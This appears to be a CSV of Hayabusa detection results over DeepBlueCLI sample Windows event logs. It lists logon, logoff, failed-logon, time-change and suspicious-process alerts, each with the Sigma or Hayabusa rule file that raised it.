2014-11-26 07:51:34.460 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x12048 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x12070 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:51:34.460 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x12048,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 07:56:09.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-26 08:03:14.476 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x12070,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:34:44.156 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:34:54.687 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:34:59.000 +09:00,IE9WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:35:04.667 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:35:04.667 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:09.745 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x131c3 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x13216 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:09.745 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x131c3,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:57.635 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 02:38:06.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 02:41:21.932 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x13216,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:43:17.671 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:43:31.734 +09:00,IE9Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:43:40.000 +09:00,IE9Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:43:56.893 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:43:56.893 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:44:39.689 +09:00,IE9Win7,4648,informational,Explicit Logon,Source User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x36aed : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x36b1d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:44:39.689 +09:00,IE9Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x36aed,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 02:46:03.000 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:59:00.431 +09:00,IE9Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:59:00.431 +09:00,IE9Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:15:07.962 +09:00,IE9Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x36b1d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 03:16:49.390 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 03:17:04.250 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:08.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 03:17:13.369 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 03:17:13.369 +09:00,IE10Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:19.150 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x11c02 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x11c32 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:19.150 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x11c02,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 03:20:34.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 03:30:25.009 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x11c32,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:46.785 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:48.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 08:21:50.498 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x170f5 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x17125 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:50.498 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x170f5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 08:23:59.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:45.552 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:25:04.605 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x17125,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:51.420 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:54.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 08:25:55.414 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1ac86 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:55.414 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b245 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:25:55.414 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1ac86,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:26:40.560 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1b245,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:46:09.645 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:46:10.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-29 00:46:12.437 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1a23a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:46:12.437 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1a265 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:46:12.437 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1a23a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-29 00:48:19.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-29 00:48:19.456 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1a265,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:46:21.297 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:46:21.750 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1e056 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:21.750 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1e3c9 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:21.750 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:33.911 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x1e3c9,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:46:34.426 +09:00,IE10Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x1e056,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:04.676 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x6831f : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:04.676 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x6832b : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:04.676 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x6831f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:20.053 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x6832b,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:36.671 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:37.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:47:38.102 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:47:38.430 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1dc1e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:38.430 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1ee41 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:47:38.430 +09:00,IE10Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x1dc1e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:48:31.289 +09:00,IE10Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x1ee41,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:38.281 +09:00,IE10Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:39.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:49:39.844 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-08-18 23:49:40.000 +09:00,IE10Win7,4648,informational,Explicit Logon,Source User: IE10WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-08-18 23:49:40.000 +09:00,IE10Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE10WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x1b293 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
